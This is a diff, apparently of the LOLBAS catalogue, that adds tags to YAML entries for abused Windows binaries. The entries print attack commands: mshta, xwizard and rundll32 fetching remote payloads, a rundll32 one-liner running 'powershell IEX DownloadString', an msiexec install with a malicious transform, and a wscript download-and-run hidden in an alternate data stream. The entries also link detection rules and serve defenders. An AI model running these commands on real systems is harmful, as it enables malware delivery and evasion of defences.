- Execute: WSH
- Command: mshta.exe https://example.com/payload - Command: mshta.exe https://example.com/payload
Description: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE) Description: It will download a remote payload and place it in INetCache.
Usecase: Downloads payload from remote server Usecase: Downloads payload from remote server
Category: Download Category: Download
Privileges: User Privileges: User
MitreID: T1105 MitreID: T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Download: INetCache
Full_Path: Full_Path:
- Path: C:\Windows\System32\mshta.exe - Path: C:\Windows\System32\mshta.exe
- Path: C:\Windows\SysWOW64\mshta.exe - Path: C:\Windows\SysWOW64\mshta.exe

View File

@ -25,6 +25,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.007 MitreID: T1218.007
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Command: msiexec /z "C:\folder\evil.dll" - Command: msiexec /z "C:\folder\evil.dll"
Description: Calls DLLUnregisterServer to un-register the target DLL. Description: Calls DLLUnregisterServer to un-register the target DLL.
Usecase: Execute dll files Usecase: Execute dll files
@ -32,6 +34,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.007 MitreID: T1218.007
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Command: msiexec /i "https://trustedURL/signed.msi" TRANSFORMS="https://evilurl/evil.mst" /qb - Command: msiexec /i "https://trustedURL/signed.msi" TRANSFORMS="https://evilurl/evil.mst" /qb
Description: Installs the target .MSI file from a remote URL, the file can be signed by vendor. Additional to the file a Transformfile will be used, which can contains malicious code or binaries. The /qb will skip user input. Description: Installs the target .MSI file from a remote URL, the file can be signed by vendor. Additional to the file a Transformfile will be used, which can contains malicious code or binaries. The /qb will skip user input.
Usecase: Install trusted and signed msi file, with additional attack code as Treansorm file, from remote server Usecase: Install trusted and signed msi file, with additional attack code as Treansorm file, from remote server
@ -42,8 +46,6 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Windows\System32\msiexec.exe - Path: C:\Windows\System32\msiexec.exe
- Path: C:\Windows\SysWOW64\msiexec.exe - Path: C:\Windows\SysWOW64\msiexec.exe
Code_Sample:
- Code:
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_web_install.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_web_install.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_masquerading.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_masquerading.yml

View File

@ -11,11 +11,11 @@ Commands:
Privileges: Admin Privileges: Admin
MitreID: T1546.007 MitreID: T1546.007
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
Full_Path: Full_Path:
- Path: C:\WINDOWS\System32\Netsh.exe - Path: C:\WINDOWS\System32\Netsh.exe
- Path: C:\WINDOWS\SysWOW64\Netsh.exe - Path: C:\WINDOWS\SysWOW64\Netsh.exe
Code_Sample:
- Code:
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_netsh_helper_dll_persistence.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_netsh_helper_dll_persistence.yml
- Splunk: https://github.com/splunk/security_content/blob/2b87b26bdc2a84b65b1355ffbd5174bdbdb1879c/detections/endpoint/processes_launching_netsh.yml - Splunk: https://github.com/splunk/security_content/blob/2b87b26bdc2a84b65b1355ffbd5174bdbdb1879c/detections/endpoint/processes_launching_netsh.yml

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.008 MitreID: T1218.008
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Command: | - Command: |
odbcconf INSTALLDRIVER "lolbas-project|Driver=c:\test\test.dll|APILevel=2" odbcconf INSTALLDRIVER "lolbas-project|Driver=c:\test\test.dll|APILevel=2"
odbcconf configsysdsn "lolbas-project" "DSN=lolbas-project" odbcconf configsysdsn "lolbas-project" "DSN=lolbas-project"
@ -20,6 +22,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.008 MitreID: T1218.008
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Command: odbcconf -f file.rsp - Command: odbcconf -f file.rsp
Description: Load DLL specified in target .RSP file. See the Code Sample section for an example .RSP file. Description: Load DLL specified in target .RSP file. See the Code Sample section for an example .RSP file.
Usecase: Execute dll file using technique that can evade defensive counter measures Usecase: Execute dll file using technique that can evade defensive counter measures

View File

@ -11,6 +11,8 @@ Commands:
Privileges: Administrator Privileges: Administrator
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: DLL
Full_Path: Full_Path:
- Path: C:\Program Files\Windows Defender\Offline\OfflineScannerShell.exe - Path: C:\Program Files\Windows Defender\Offline\OfflineScannerShell.exe
Detection: Detection:

View File

@ -18,6 +18,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1202 MitreID: T1202
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Tags:
- Execute: DLL
- Command: pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java - Command: pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java
Description: Open the target .CPL file with the Program Compatibility Assistant. Description: Open the target .CPL file with the Program Compatibility Assistant.
Usecase: Execution of CPL files Usecase: Execution of CPL files
@ -27,8 +29,6 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path: Full_Path:
- Path: C:\Windows\System32\pcalua.exe - Path: C:\Windows\System32\pcalua.exe
Code_Sample:
- Code:
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_pcalua.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_pcalua.yml
Resources: Resources:

View File

@ -12,12 +12,14 @@ Commands:
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: Presentationhost.exe https://example.com/payload - Command: Presentationhost.exe https://example.com/payload
Description: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE) Description: It will download a remote payload and place it in INetCache.
Usecase: Downloads payload from remote server Usecase: Downloads payload from remote server
Category: Download Category: Download
Privileges: User Privileges: User
MitreID: T1105 MitreID: T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Download: INetCache
Full_Path: Full_Path:
- Path: C:\Windows\System32\Presentationhost.exe - Path: C:\Windows\System32\Presentationhost.exe
- Path: C:\Windows\SysWOW64\Presentationhost.exe - Path: C:\Windows\SysWOW64\Presentationhost.exe

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1105 MitreID: T1105
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Type: Compression
- Command: PrintBrm -r -f C:\Users\user\Desktop\data.txt:hidden.zip -d C:\Users\user\Desktop\new_folder - Command: PrintBrm -r -f C:\Users\user\Desktop\data.txt:hidden.zip -d C:\Users\user\Desktop\new_folder
Description: Extract the contents of a ZIP file stored in an Alternate Data Stream (ADS) and store it in a folder Description: Extract the contents of a ZIP file stored in an Alternate Data Stream (ADS) and store it in a folder
Usecase: Decompress and extract a ZIP file stored on an alternate data stream to a new folder Usecase: Decompress and extract a ZIP file stored on an alternate data stream to a new folder
@ -18,6 +20,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1564.004 MitreID: T1564.004
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Type: Compression
Full_Path: Full_Path:
- Path: C:\Windows\System32\spool\tools\PrintBrm.exe - Path: C:\Windows\System32\spool\tools\PrintBrm.exe
Detection: Detection:

View File

@ -11,10 +11,10 @@ Commands:
Privileges: User, Administrator in Windows 8 Privileges: User, Administrator in Windows 8
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1
Tags:
- Execute: DLL
Full_Path: Full_Path:
- Path: C:\Windows\System32\rasautou.exe - Path: C:\Windows\System32\rasautou.exe
Code_Sample:
- Code:
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_rasautou_dll_execution.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_rasautou_dll_execution.yml
- IOC: rasautou.exe command line containing -d and -p - IOC: rasautou.exe command line containing -d and -p

View File

@ -11,6 +11,9 @@ Commands:
Privileges: Local Admin Privileges: Local Admin
MitreID: T1218.009 MitreID: T1218.009
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Input: Custom Format
- Command: regasm.exe /U AllTheThingsx64.dll - Command: regasm.exe /U AllTheThingsx64.dll
Description: Loads the target .DLL file and executes the UnRegisterClass function. Description: Loads the target .DLL file and executes the UnRegisterClass function.
Usecase: Execute code and bypass Application whitelisting Usecase: Execute code and bypass Application whitelisting
@ -18,13 +21,14 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.009 MitreID: T1218.009
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Input: Custom Format
Full_Path: Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe
Code_Sample:
- Code:
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml
- Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
Full_Path: Full_Path:
- Path: C:\Windows\System32\Register-cimprovider.exe - Path: C:\Windows\System32\Register-cimprovider.exe
- Path: C:\Windows\SysWOW64\Register-cimprovider.exe - Path: C:\Windows\SysWOW64\Register-cimprovider.exe

View File

@ -11,6 +11,9 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.009 MitreID: T1218.009
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Input: Custom Format
- Command: regsvcs.exe AllTheThingsx64.dll - Command: regsvcs.exe AllTheThingsx64.dll
Description: Loads the target .DLL file and executes the RegisterClass function. Description: Loads the target .DLL file and executes the RegisterClass function.
Usecase: Execute dll file and bypass Application whitelisting Usecase: Execute dll file and bypass Application whitelisting
@ -18,11 +21,12 @@ Commands:
Privileges: Local Admin Privileges: Local Admin
MitreID: T1218.009 MitreID: T1218.009
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Input: Custom Format
Full_Path: Full_Path:
- Path: c:\Windows\Microsoft.NET\Framework\v*\regsvcs.exe - Path: c:\Windows\Microsoft.NET\Framework\v*\regsvcs.exe
- Path: c:\Windows\Microsoft.NET\Framework64\v*\regsvcs.exe - Path: c:\Windows\Microsoft.NET\Framework64\v*\regsvcs.exe
Code_Sample:
- Code:
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml
- Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.011 MitreID: T1218.011
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Command: rundll32.exe \\10.10.10.10\share\payload.dll,EntryPoint - Command: rundll32.exe \\10.10.10.10\share\payload.dll,EntryPoint
Description: Use Rundll32.exe to execute a DLL from a SMB share. EntryPoint is the name of the entry point in the .DLL file to execute. Description: Use Rundll32.exe to execute a DLL from a SMB share. EntryPoint is the name of the entry point in the .DLL file to execute.
Usecase: Execute DLL from SMB share. Usecase: Execute DLL from SMB share.
@ -18,6 +20,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.011 MitreID: T1218.011
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');") - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');")
Description: Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site. Description: Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site.
Usecase: Execute code from Internet Usecase: Execute code from Internet
@ -53,6 +57,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1564.004 MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Command: rundll32.exe -sta {CLSID} - Command: rundll32.exe -sta {CLSID}
Description: Use Rundll32.exe to load a registered or hijacked COM Server payload. Also works with ProgID. Description: Use Rundll32.exe to load a registered or hijacked COM Server payload. Also works with ProgID.
Usecase: Execute a DLL/EXE COM server payload or ScriptletURL code. Usecase: Execute a DLL/EXE COM server payload or ScriptletURL code.
@ -60,11 +66,11 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.011 MitreID: T1218.011
OperatingSystem: Windows 10 (and likely previous versions), Windows 11 OperatingSystem: Windows 10 (and likely previous versions), Windows 11
Tags:
- Execute: DLL
Full_Path: Full_Path:
- Path: C:\Windows\System32\rundll32.exe - Path: C:\Windows\System32\rundll32.exe
- Path: C:\Windows\SysWOW64\rundll32.exe - Path: C:\Windows\SysWOW64\rundll32.exe
Code_Sample:
- Code:
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_rundll32_net_connections.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_rundll32_net_connections.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1564.004 MitreID: T1564.004
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Type: Compression
- Command: tar -xf compressedfilename:ads - Command: tar -xf compressedfilename:ads
Description: Decompress a compressed file from an alternate data stream (ADS). Description: Decompress a compressed file from an alternate data stream (ADS).
Usecase: Can be used to evade defensive countermeasures, or to hide as part of a persistence mechanism Usecase: Can be used to evade defensive countermeasures, or to hide as part of a persistence mechanism
@ -18,6 +20,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1564.004 MitreID: T1564.004
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Type: Compression
- Command: tar -xf \\host1\archive.tar - Command: tar -xf \\host1\archive.tar
Description: Extracts archive.tar from the remote (internal) host (host1) to the current host. Description: Extracts archive.tar from the remote (internal) host (host1) to the current host.
Usecase: Copy files Usecase: Copy files
@ -25,6 +29,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1105 MitreID: T1105
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Type: Compression
Full_Path: Full_Path:
- Path: C:\Windows\System32\tar.exe - Path: C:\Windows\System32\tar.exe
- Path: C:\Windows\SysWOW64\tar.exe - Path: C:\Windows\SysWOW64\tar.exe

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1127 MitreID: T1127
OperatingSystem: Windows 7, Windows 10, Windows 11 OperatingSystem: Windows 7, Windows 10, Windows 11
Tags:
- Execute: WSH
- Command: vbc -reference:Microsoft.VisualBasic.dll c:\temp\vbs\run.vb - Command: vbc -reference:Microsoft.VisualBasic.dll c:\temp\vbs\run.vb
Description: Binary file used by .NET to compile Visual Basic code to an executable. Description: Binary file used by .NET to compile Visual Basic code to an executable.
Usecase: Compile attacker code on system. Bypass defensive counter measures. Usecase: Compile attacker code on system. Bypass defensive counter measures.
@ -18,6 +20,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1127 MitreID: T1127
OperatingSystem: Windows 7, Windows 10, Windows 11 OperatingSystem: Windows 7, Windows 10, Windows 11
Tags:
- Execute: WSH
Full_Path: Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v3.5\vbc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v3.5\vbc.exe
@ -28,6 +32,4 @@ Detection:
- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml
Acknowledgement: Acknowledgement:
- Person: Lior Adar - Person: Lior Adar
Handle:
- Person: Hai Vaknin(Lux) - Person: Hai Vaknin(Lux)
Handle:

View File

@ -39,11 +39,11 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: WSH
Full_Path: Full_Path:
- Path: C:\Windows\System32\wbem\wmic.exe - Path: C:\Windows\System32\wbem\wmic.exe
- Path: C:\Windows\SysWOW64\wbem\wmic.exe - Path: C:\Windows\SysWOW64\wbem\wmic.exe
Code_Sample:
- Code:
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1564.004 MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: WSH
- Command: echo GetObject("script:https://raw.githubusercontent.com/sailay1996/misc-bin/master/calc.js") > %temp%\test.txt:hi.js && wscript.exe %temp%\test.txt:hi.js - Command: echo GetObject("script:https://raw.githubusercontent.com/sailay1996/misc-bin/master/calc.js") > %temp%\test.txt:hi.js && wscript.exe %temp%\test.txt:hi.js
Description: Download and execute script stored in an alternate data stream Description: Download and execute script stored in an alternate data stream
Usecase: Execute hidden code to evade defensive counter measures Usecase: Execute hidden code to evade defensive counter measures
@ -21,8 +23,6 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Windows\System32\wscript.exe - Path: C:\Windows\System32\wscript.exe
- Path: C:\Windows\SysWOW64\wscript.exe - Path: C:\Windows\SysWOW64\wscript.exe
Code_Sample:
- Code:
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wscript_cscript_script_exec.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wscript_cscript_script_exec.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml

View File

@ -5,16 +5,16 @@ Author: 'David Middlehurst'
Created: 2020-09-23 Created: 2020-09-23
Commands: Commands:
- Command: wuauclt.exe /UpdateDeploymentProvider Full_Path_To_DLL /RunHandlerComServer - Command: wuauclt.exe /UpdateDeploymentProvider Full_Path_To_DLL /RunHandlerComServer
Description: Full_Path_To_DLL would be the abosolute path to .DLL file and would execute code on attach. Description: Full_Path_To_DLL would be the absolute path to .DLL file and would execute code on attach.
Usecase: Execute dll via attach/detach methods Usecase: Execute dll via attach/detach methods
Category: Execute Category: Execute
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows 10 OperatingSystem: Windows 10
Tags:
- Execute: DLL
Full_Path: Full_Path:
- Path: C:\Windows\System32\wuauclt.exe - Path: C:\Windows\System32\wuauclt.exe
Code_Sample:
- Code:
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/network_connection/net_connection_win_wuauclt_network_connection.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/network_connection/net_connection_win_wuauclt_network_connection.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_wuauclt.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_wuauclt.yml

View File

@ -19,12 +19,14 @@ Commands:
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM - Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM
Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file, and save it to %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION> or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION> Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file, and save it to INetCache.
Usecase: Download file from Internet Usecase: Download file from Internet
Category: Download Category: Download
Privileges: User Privileges: User
MitreID: T1105 MitreID: T1105
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Download: INetCache
Full_Path: Full_Path:
- Path: C:\Windows\System32\xwizard.exe - Path: C:\Windows\System32\xwizard.exe
- Path: C:\Windows\SysWOW64\xwizard.exe - Path: C:\Windows\SysWOW64\xwizard.exe

View File

@ -18,6 +18,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.011 MitreID: T1218.011
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Input: INF
- Command: rundll32.exe advpack.dll,RegisterOCX test.dll - Command: rundll32.exe advpack.dll,RegisterOCX test.dll
Description: Launch a DLL payload by calling the RegisterOCX function. Description: Launch a DLL payload by calling the RegisterOCX function.
Usecase: Load a DLL payload. Usecase: Load a DLL payload.
@ -25,6 +27,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.011 MitreID: T1218.011
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: DLL
- Command: rundll32.exe advpack.dll,RegisterOCX calc.exe - Command: rundll32.exe advpack.dll,RegisterOCX calc.exe
Description: Launch an executable by calling the RegisterOCX function. Description: Launch an executable by calling the RegisterOCX function.
Usecase: Run an executable payload. Usecase: Run an executable payload.

View File

@ -25,6 +25,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.011 MitreID: T1218.011
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: DLL
